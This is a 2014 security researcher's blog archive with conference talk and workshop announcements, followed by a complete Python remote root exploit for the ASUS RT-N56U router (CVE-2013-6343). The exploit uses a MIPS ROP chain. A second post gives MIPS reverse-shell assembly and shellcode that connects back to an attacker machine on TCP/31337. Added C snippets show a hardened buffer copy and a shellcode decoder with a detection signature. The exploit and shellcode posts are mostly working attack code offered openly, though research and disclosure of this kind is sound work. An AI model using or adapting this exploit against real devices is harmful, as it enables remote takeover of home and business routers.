Friday, July 25, 2014

SOHOpelessly Broken - DEFCON Router Hacking Contest

http://sohopelesslybroken.com/

This year at DEFCON 22, for the first time ever, Independent Security Evaluators (ISE) and the Electronic Frontier Foundation (EFF) are hosting a no-holds-barred router hacking competition. You're hereby challenged to compete in one or both tracks of the SOHOpelessly BROKEN contest.


HACK AND GET PAID! #SOHOpelesslyBroken

Monday, June 23, 2014

[Black Hat USA 2014] Let's get N.A.S.ty at my BH briefing!

Register for Black Hat USA 2014!!

Jacob Holcomb

Independent Security Evaluators

Residing in Baltimore, MD, Jacob works as a Security Analyst for Independent Security Evaluators. At ISE, Jacob works on projects that involve penetration testing, application security, network security, and exploit research and development. In addition to projects at work, coding, and his favorite pastime of EIP hunting, Jacob loves to hack his way through the interwebz and has responsibly disclosed several 0-day vulnerabilities in commercial products.


Network Attached Shell: N.A.S.ty Systems that Store Network Accessible Shells

Through extensive analysis, Independent Security Evaluators (ISE) has identified dozens of previously undisclosed, critical security vulnerabilities in numerous network storage devices from a handful of go-to manufacturers (e.g., Seagate, D-Link, Netgear). Vulnerabilities in network-attached storage not only expose stored data, but also provide a vantage point for further PWNAGE of the network infrastructure on which the storage system sits. Our research efforts focused on identifying vulnerabilities that yield administrative access (such as command injection, directory traversal, authentication bypass, memory corruption, backdoors, etc.), and quantifying the associated risk.

The attacks we developed demonstrate how unauthenticated attackers can compromise and control storage systems with and without user interaction.

Network based storage systems are used in millions of homes, schools, government agencies, and businesses around the world for data storage and retrieval. With today's dependence on Internet based services, virtualization technologies, and the need to access data from anywhere, storage systems are relied on more than ever. Similar to other network hardware (e.g., routers), these devices are purchased and installed by IT teams and home consumers with the expectation that the system is protected from the infamous hacker.

This presentation focuses on "how to," and the implications of compromising network based storage systems, but will conclude that the absence of security in not only storage hardware, but networking hardware in general, has left data unprotected and millions of networks vulnerable to exploitation.

Throughout this presentation, several vulnerabilities will be exploited in order to achieve the glorious ro0t (#) shell!

Black Hat - https://www.blackhat.com/us-14/speakers/Jacob-Holcomb.html

Sunday, June 22, 2014

HOPE X Workshop

HOPE X


I will be teaching an application security workshop at HOPE X, and hope to see you there!

Workshop Title - Extensively Adaptable Sploits and Tools for Encroaching on Router Security
Details


* Extensively Adaptable Sploits and Tools for Encroaching on Router Security will teach attendees penetration testing methodology for testing the security of SOHO routers. This workshop will provide an overview of application security issues commonly found in routers, demonstrate how attackers exploit these issues, and enlighten attendees on common methods used to remediate critical system deficiencies. Throughout this course, attendees will learn the skills necessary to discover vulnerabilities and develop custom, reliable exploits.

After attending this workshop, attendees should be more comfortable performing penetration tests against networked systems and discovering vulnerabilities ranging in criticality (i.e., information disclosures to remote code execution).

* Information Gathering
    * Discovering and documenting system settings from black and white box perspectives.
* Scanning and Service Enumeration
    * Service discovery and verification
    * Services enumeration
* Gaining Access
    * Analyze web applications
        * What to look for
        * Tools and Techniques
    * Analyze network servers (e.g., FTP, SMB, HTTP)
        * What to look for
        * Tools and Techniques
    * Static Code Analysis (Source Code Review)
        * What to look for
        * Tools and Techniques
    * Dynamic Analysis (Network Service Fuzzing)
        * What to look for
        * Tools and Techniques
    * Reverse Engineering
        * What to look for
        * Tools and Techniques
* Exploit Development
* Web Application Vulnerability Overview
    * OWASP Top 10
* Application Vulnerability Overview
    * Buffer Overflows
    * Directory Traversal
    * Insecure Cryptographic Storage
    * Authentication and Authorization
    * Misconfigurations
    * Information Disclosure
* Social Engineering Overview
* Maintaining Access
* Responsible Vulnerability Disclosure

This workshop emphasizes the “how to” aspect of application security and exploit development. Attendees will be provided with sample binaries for exercises that will be conducted during the workshop, and access to a lab of networked routers where newly learned skills can be applied.

1. Attendees will learn how to discover, exploit, and mitigate vulnerabilities found in network-based equipment. This workshop will focus on exploiting vulnerabilities in routers, but the methodologies presented are applicable to other hardware platforms as well.

2. Attendees will become acquainted with numerous types of application and web application vulnerabilities.


Who is the workshop intended for?

* This workshop is suited for a broad range of security professionals, from systems engineers to those performing security assessments, with intermediate to advanced computer science skill sets. This is a fast-paced workshop that starts off catering to inexperienced information security professionals by providing a general overview of common vulnerabilities and how they can be exploited, but then quickly moves into more advanced topics such as using return-oriented programming (ROP) to exploit stack-based buffer overflows on the MIPS architecture.

Attendees must be familiar with Linux, web attacks (OWASP Top 10), memory corruption attacks (specifically stack-based buffer overflows), and using the command line! Additionally, attendees need to be comfortable writing code for proof-of-concept attacks, and reading source code written in various programming languages such as JavaScript and C.

Duration:   3.5 hours
Material cost:  none
Anything for participants to bring?
* Attendees will need a laptop that is capable of running virtual machines and accessing the Internet.
* An updated Kali Linux installation (i.e., a Kali Linux virtual machine configured to use bridge mode networking or a native Kali Linux install).
* The latest version of statically linked Qemu installed on Kali Linux (qemu-user-static).


Workshop Slides - http://securityevaluators.com/knowledge/presentations/HOPEX_HOLCOMB.pdf

Sunday, January 19, 2014

[Exploit] ASUS RT-N56U Remote Root Shell Buffer Overflow


From its hardened state, the RT-N56U runs an HTTP server on TCP/80. This HTTP server is vulnerable to multiple buffer overflow attacks during the command processing routine (CVE-2013-6343) of the media application configuration and installation process. In the same fashion that Broadcom ACSD was exploited, an attacker can connect to the HTTPD service and submit a command string that is larger than the program's fixed-length buffer. Upon doing so, the attacker will have corrupted the HTTP server's call stack and altered the execution flow of the program.
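The defect class described above, as an added illustration in C (not ASUS's httpd source, which is not reproduced here): a request parameter copied into a fixed-size stack buffer with no bound, beside a hardened handler that measures with a bound, rejects what does not fit rather than truncating, and restricts the value to an assumed allow-list of characters. APPS_NAME_MAX, the function names and the allow-list are assumptions for illustration, not values from the router firmware.

```c
/* Added example, not ASUS's code: the generic fixed-buffer copy defect beside
 * a bounded, validating replacement. Names and sizes are illustrative. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define APPS_NAME_MAX 32   /* hypothetical fixed buffer size, not the real one */

/* Vulnerable pattern: strcpy trusts the caller's length. A value longer than
 * APPS_NAME_MAX - 1 bytes runs past `name` into the saved registers and the
 * return address on the stack, which is what a stack overflow relies on. */
int handle_apps_name_unsafe(const char *param)
{
    char name[APPS_NAME_MAX];
    strcpy(name, param);               /* no bound on the copy */
    return (int)strlen(name);
}

/* Hardened pattern: scan with a bound, refuse anything that does not fit
 * together with its terminator, and restrict the value to the characters an
 * application name is expected to contain (assumed allow-list).
 * Returns 0 on success, -1 when the request should be rejected. */
int copy_apps_name(const char *param, char *out, size_t outsz)
{
    size_t len = 0;
    while (len < outsz && param[len] != '\0') {      /* never reads past outsz */
        unsigned char c = (unsigned char)param[len];
        if (!isalnum(c) && c != '_' && c != '-')
            return -1;                               /* unexpected character */
        len++;
    }
    if (len >= outsz)
        return -1;                                   /* too long: reject, do not truncate */
    memcpy(out, param, len);
    out[len] = '\0';
    return 0;
}

/* Request-handler shaped wrapper: accept (0) or reject (-1) a parameter value. */
int accept_apps_name(const char *param)
{
    char name[APPS_NAME_MAX];
    return copy_apps_name(param, name, sizeof name);
}
```

The point of the hardened version is that the length check happens before any write, uses the destination size as its bound, and fails closed: an over-long value is rejected at the HTTP layer instead of being silently shortened or allowed to reach the stack.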

The RT-N56U exploit utilizes return-oriented programming (ROP) to circumvent stack randomization, but does not need to cause a context switch by calling the sleep() function. At the time of code execution, the RT-N56U has already performed a context switch and written the d-cache (data cache) back to RAM. Because of this condition, the RT-N56U exploit utilizes a call to sched_yield(), which relinquishes the CPU to a ready-to-run process (if one exists) whose execution priority is greater than or equal to that of the HTTPD process.

Finally, I direct the program's execution to custom shellcode residing on the program's call stack, which, when executed, connects back to the attacker's machine on TCP/31337 and spawns a root system shell.



#!/usr/bin/env python

from time import sleep
from sys import exit
import urllib2, signal, struct, base64, socket, ssl

# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
# [*] Discovered and Reported: October 2013
# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
# [*] Contact: Twitter - @rootHak42
# [*] Software Vendor: http://asus.com
# [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
# [*] Software: httpd (Listens on TCP/80 and TCP/443)
# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
#
# [*] Overview:
#       Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
#       supplemental applications. This install process is handled by the routers web server,
#       and is susceptible to multiple Buffer Overflow attacks.
#
#       Vulnerable Web Page: APP_Installation.asp
#       Vulnerable HTML Parameters: apps_name, apps_flag
#       Vulnerable Source File: web.c of httpd code
#       *Firmware versions prior to the tested version were vulnerable to this attack.
#


def fingerPrint(host, port, netSock):

    fprint = ["RT-N56U"]
    found = None
    print " [*] Preparing to fingerprint the server."
    try:
        print " [*] Connecting to %s on port %d." % (host, port)
        netSock.connect((host, port))
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print " [*] Sending fingerprint request."
        netSock.send("HEAD / HTTP/1.1\r\n\r\n")
        netData = netSock.recv(1024)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print " [*] Closing network socket.\n"
        netSock.close()
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)

    for item in fprint:
        if item in netData:
            print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
            sleep(1)
            found = item
    if found == None:
        print " [!!!] Server banner doesn't match available targets. [!!!]\n"
        sleep(1)
        exit(0)
    else:
        return found


def targURL():

    while True:
  
        URL = raw_input("\n[*] Please enter the URL of the router. Ex. http://192.168.1.1\n>")
        if len(URL) != 0 and (URL[0:7] == "http://" or URL[0:8] == "https://"):
            return URL.lower()
        else:
            print "\n\n [!!!] Target URL cant be null and must contain http:// or https:// [!!!]\n"
            sleep(1)


def creds():

    while True:

        User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
        Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
        if len(User) != 0:
            return User, Pass
        else:
            print "\n [!!!] Username cant be null [!!!]\n"
            sleep(1)


def basicAuth():

    auth = None

    while auth != "yes" and auth != "no":
        auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")

        if auth.lower() == "yes":
            print "\n\n[!!!] You chose to use HTTP Basic Authentication [!!!]\n"
            sleep(1)
            User, Pass = creds()
            return base64.encodestring("%s:%s" % (User, Pass)).replace("\n", "")
        elif auth.lower() == "no":
            print "\n\n[!!!] You chose not to use HTTP Basic Authentication. [!!!]\n"
            sleep(1)
            return 0
        else:
            print "\n\n[!!!] Error: You entered %s. Please enter \"yes\" or \"no\"! [!!!]\n" % auth
            sleep(1)


def sigHandle(signum, frm): # Signal handler
   
    print "\n\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)


def main():

    print """\n[*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
[*] Discovered and Reported: October 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
[*] Contact: Twitter - @rootHak42
[*] Software Vendor: http://asus.com
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
[*] Software: httpd (Listens on TCP/80 and TCP/443)
[*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
[*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343\n"""
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c

    target = targURL()
    try:
        print "\n [*] Creating network socket"
        netSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if target[0:5] == "https":
            host = target[8:]
            port = 443
            print " [*] Preparing SSL/TLS support."
            https_netSock = ssl.wrap_socket(netSock)
            finger = fingerPrint(host, port, https_netSock)
        else:
            host = target[7:]
            port = 80
            finger = fingerPrint(host, port, netSock)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    auth = basicAuth()
    junk = "\x42" * 109
    link_nop = "2Aa3"

    #Base address of ld_uClibc and libc in httpd address space
    ld_uClibcBase = 0x2aaa8000
    libcBaseAddr = 0x2ab5f000

    #Rop Chain
    #<chown+68>:   move    v0,s0 -> sched_yield()
    #<chown+72>:   lw  ra,28(sp) -> Rop2
    #<chown+76>:   lw  s0,24(sp)
    #<chown+80>:   jr  ra
    #<chown+84>:   addiu   sp,sp,32
    saved_ra1 = struct.pack("<L", libcBaseAddr + 0x73f4)

    #<_dl_runtime_pltresolve+68>:  lw  ra,36(sp) -> Rop 3
    #<_dl_runtime_pltresolve+72>:  lw  a0,16(sp)
    #<_dl_runtime_pltresolve+76>:  lw  a1,20(sp)
    #<_dl_runtime_pltresolve+80>:  lw  a2,24(sp)
    #<_dl_runtime_pltresolve+84>:  lw  a3,28(sp)
    #<_dl_runtime_pltresolve+88>:  addiu   sp,sp,40
    #<_dl_runtime_pltresolve+92>:  move    t9,v0
    #<_dl_runtime_pltresolve+96>:  jr  t9 -> jump sched_yield()
    #<_dl_runtime_pltresolve+100>: nop
    saved_ra2 = struct.pack("<L", ld_uClibcBase + 0x4e94)

    #<setrlimit64+144>:    addiu   a1,sp,24 -> ptr to stack
    #<setrlimit64+148>:    lw  gp,16(sp)
    #<setrlimit64+152>:    lw  ra,32(sp) -> Rop 4
    #<setrlimit64+156>:    jr  ra -> jump Rop 4
    #<setrlimit64+160>:    addiu   sp,sp,40
    saved_ra3 = struct.pack("<L", libcBaseAddr + 0x9ce0)

    #move    t9,a1 -> ptr to jalr sp on stack
    #addiu   a0,a0,56
    #jr      t9 -> jump to stack
    #move    a1,a2
    saved_ra4 = struct.pack("<L", libcBaseAddr + 0x308fc)

    #sched_yield()
    sch_yield_s0 = struct.pack("<L", libcBaseAddr + 0x94b0)
 
    #Stage 1 Shellcode
    jalr_sp =  "\x09\xf8\xa0\x03"

    #Stage 2 Shellcode (Stack Pivot) by Jacob Holcomb of ISE
    stg2_SC = "\x2c\x08\xbd\x27"# addiu sp, sp, 2092
    stg2_SC += "\x09\xf8\xa0\x03"# jalr sp
    stg2_SC += "\x32\x41\x61"#filler for link (branch delay)

    #Stage 3 Shellcode
    #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE
    #Connects on 192.168.1.177:31337
    stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01"

    payload =  junk + sch_yield_s0 + junk[0:12] + saved_ra1 + junk[0:32]
    payload += saved_ra2 + junk[0:36] + saved_ra3 + junk[0:24] + jalr_sp
    payload += link_nop + saved_ra4 + junk[0:4] + stg2_SC
    postData = "apps_action=install&apps_path=&apps_name=%s&apps_flag=sdb1" % payload

    try:
        print "\n [*] Preparing the malicious web request."
        httpRequest = urllib2.Request("%s/APP_Installation.asp" % target, data = postData)
        httpRequest.add_header("Cookie", "hwaddr=" + junk[0:35] + stg3_SC + "\x42" * (265 - len(stg3_SC)))
        if auth != 0:
            httpRequest.add_header("Authorization", "Basic %s" % auth)
        print " [*] Successfully built HTTP POST request."

    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print """ [*] Preparing to send Evil PAYLoAd to %s on port %d!\n [*] Payload Length: %d
 [*] Waiting...""" % (host, port, len(payload))
        sploit = urllib2.urlopen(httpRequest, None, 6)
        if sploit.getcode() == 200:
            print " [*] Server Response: HTTP 200 OK. Get ready 2 catch roOt on TCP/31337!"
        else:
            print " [*] Server Response: HTTP %d. Something went wrong!" % sploit.getcode()

    except(urllib2.URLError) as error:
        print "\n [!!!] Web request error! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    finally:
        print " [*] %s exploit code has finished.\n" % finger

if __name__ == "__main__":
    main()   

Sunday, November 3, 2013

[Shellcode] MIPS Little Endian Reverse Shell Shellcode (Linux)

# MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode
# Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators
# Blog: http://infosec42.blogspot.com
# Company Website: http://securityevaluators.com


--G42_MIPS_rev_shell.s-- 


    .data

    .bss

    .text

    .globl _start

_start:

    #Close stdin(0)
    slti $a0, $zero, 0xFFFF
    li $v0, 4006
    syscall 0x42424

    #Close stdout(1)
    slti $a0, $zero, 0x1111
    li $v0, 4006
    syscall 0x42424

    #Close stderr(2)
    li $t4, 0xFFFFFFFD #-3
    not $a0, $t4
    li $v0, 4006
    syscall 0x42424

    #Socket Domain - AF_INET (2)
    li $t4, 0xFFFFFFFD #-3
    not $a0, $t4
    #Socket Type - SOCK_STREAM (2 for mips)
    not $a1, $t4
    #Socket Protocol - 0
    slti $a2, $zero, 0xFFFF
    #Call socket
    li $v0, 4183
    syscall 0x42424

    #Move socket return value (v0) to register a0
    #V0 must be below 0xFFFF/65535
    andi $a0, $v0, 0xFFFF

    #Calling dup three times
    #Duplicate FD (stdin)
    #Socket returned fd 0 - stdin goes to socket
    #-----
    #Duplicate FD (stdout)
    li $v0, 4041
    syscall 0x42424
    #Duplicate FD (stderr)
    li $v0, 4041
    syscall 0x42424

    #Connect sockfd
    #Socket FD is already in a0
    #-----
    #Connect sockaddr
    lui $a1, 0x6979 #Port:
    ori $a1, 0xFF01 #31337
    addi $a1, $a1, 0x0101
    sw $a1, -8($sp)

    li $a1, 0xB101A8C0 #192.168.1.177
    sw $a1, -4($sp)
    addi $a1, $sp, -8

    #Connect addrlen - 16
    li $t4, 0xFFFFFFEF #-17
    not $a2, $t4
    #Call connect
    li $v0, 4170
    syscall 0x42424

    #Putting /bin/sh onto the stack
    lui $t0, 0x6962 #Loading Upper Immediate - ib
    ori $t0, $t0,0x2f2f #Bitwise OR Immediate - //
    sw $t0, -20($sp) #Store word pointer to command string for execution
    #
    lui $t0, 0x6873 #Loading Upper Immediate - hs
    ori $t0, 0x2f6e #Bitwise OR Immediate - /n
    sw $t0, -16($sp) #Store word pointer to command string for execution
    #
    slti $a3, $zero, 0xFFFF #Putting null (0) onto stack
    sw $a3, -12($sp)
    sw $a3, -4($sp)

    #execve *filename
    addi $a0, $sp, -20
    #execve *argv[]
    addi $t0, $sp, -20
    sw $t0, -8($sp)
    addi $a1, $sp, -8
    #
    addiu $sp, $sp, -20 #Adjusting stack 
    #
    #execve envp[] - 0
    slti $a2, $zero, 0xFFFF
    #Call execve
    li $v0, 4011
    syscall 0x42424




# NOTE: Assembled shellcode
#
#    #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE
#    #Connects on 192.168.1.177:31337
#    stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
#    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
#    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
#    stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
#    stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
#    stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
#    stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
#    stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
#    stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
#    stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
#    stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
#    stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
#    stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01"
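Added example, not part of the original post: a minimal MIPS32 little-endian decoder in C that covers only the instruction forms used in the listing above (slti, addi, addiu, andi, ori, lui, sw, nor and syscall), together with a defender-side check for the o32 execve pattern (syscall number 4011 loaded into $v0 immediately followed by a syscall). It embeds the 200 assembled bytes from the post so the decoded text can be compared line by line with the .s source; register names follow the standard o32 convention and the function names are my own.

```c
/* Added example, not the author's code: decode the listed shellcode bytes
 * back into mnemonics and look for the execve syscall pattern. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const char *REG[32] = {
    "$zero", "$at", "$v0", "$v1", "$a0", "$a1", "$a2", "$a3",
    "$t0", "$t1", "$t2", "$t3", "$t4", "$t5", "$t6", "$t7",
    "$s0", "$s1", "$s2", "$s3", "$s4", "$s5", "$s6", "$s7",
    "$t8", "$t9", "$k0", "$k1", "$gp", "$sp", "$fp", "$ra" };

/* Decode one instruction word into `out`; returns 0 for an encoding this
 * decoder does not handle (only the forms present in the listing are known). */
int decode_word(uint32_t w, char *out, size_t n)
{
    unsigned op = w >> 26, rs = (w >> 21) & 31, rt = (w >> 16) & 31;
    unsigned rd = (w >> 11) & 31, funct = w & 63;
    int simm = (int16_t)(w & 0xffff);          /* sign-extended immediate */
    unsigned uimm = w & 0xffff;                /* zero-extended immediate */
    switch (op) {
    case 0:  /* SPECIAL: only syscall and nor occur in the listing */
        if (funct == 0x0c) { snprintf(out, n, "syscall 0x%x", (unsigned)((w >> 6) & 0xfffff)); return 1; }
        if (funct == 0x27) { snprintf(out, n, "nor %s, %s, %s", REG[rd], REG[rs], REG[rt]); return 1; }
        return 0;
    case 8:  snprintf(out, n, "addi %s, %s, %d", REG[rt], REG[rs], simm); return 1;
    case 9:  snprintf(out, n, "addiu %s, %s, %d", REG[rt], REG[rs], simm); return 1;
    case 10: snprintf(out, n, "slti %s, %s, %d", REG[rt], REG[rs], simm); return 1;
    case 12: snprintf(out, n, "andi %s, %s, 0x%x", REG[rt], REG[rs], uimm); return 1;
    case 13: snprintf(out, n, "ori %s, %s, 0x%x", REG[rt], REG[rs], uimm); return 1;
    case 15: snprintf(out, n, "lui %s, 0x%x", REG[rt], uimm); return 1;
    case 43: snprintf(out, n, "sw %s, %d(%s)", REG[rt], simm, REG[rs]); return 1;
    default: return 0;
    }
}

/* Convenience for checks: does `w` decode to exactly `expected`? */
int decodes_to(uint32_t w, const char *expected)
{
    char buf[64];
    return decode_word(w, buf, sizeof buf) && strcmp(buf, expected) == 0;
}

static uint32_t le32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }

/* The assembled bytes from the post, copied verbatim (200 bytes). */
static const char SHELLCODE[] =
    "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    "\xab\x0f\x02\x24\x0c\x09\x09\x01";
#define SHELLCODE_LEN (sizeof SHELLCODE - 1)

/* Number of words in the listing that decode_word cannot name (expected: 0). */
int undecodable_words(void)
{
    char buf[64];
    int bad = 0;
    for (size_t i = 0; i + 4 <= SHELLCODE_LEN; i += 4)
        if (!decode_word(le32((const uint8_t *)SHELLCODE + i), buf, sizeof buf)) bad++;
    return bad;
}

/* Defender-side signature: o32 execve (4011) loaded into $v0 by addiu and
 * immediately followed by syscall. Returns the byte offset of the load, or -1. */
long find_execve_syscall(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 8 <= len; i += 4) {
        uint32_t a = le32(buf + i), b = le32(buf + i + 4);
        int loads_4011 = (a >> 26) == 9 && ((a >> 16) & 31) == 2 && (a & 0xffff) == 4011;
        int is_syscall = (b >> 26) == 0 && (b & 63) == 0x0c;
        if (loads_4011 && is_syscall) return (long)i;
    }
    return -1;
}

int main(void)
{
    char buf[64];
    for (size_t i = 0; i + 4 <= SHELLCODE_LEN; i += 4) {
        uint32_t w = le32((const uint8_t *)SHELLCODE + i);
        printf("%3zu: %08x  %s\n", i, (unsigned)w, decode_word(w, buf, sizeof buf) ? buf : "<unknown>");
    }
    printf("execve pattern at byte offset %ld\n", find_execve_syscall((const uint8_t *)SHELLCODE, SHELLCODE_LEN));
    return 0;
}
```

Each printed line gives the byte offset, the word as assembled, and its decoded form, so the `li`/`not` pseudo-instructions in the .s file can be seen as the `addiu`/`lui`+`ori`/`nor` encodings the assembler actually emitted. Because the decoder names only the forms that appear in this listing, a non-zero `undecodable_words()` on some other byte string means the string uses encodings this helper does not cover, not that it is harmless; likewise the execve signature is one narrow pattern, not a general shellcode detector.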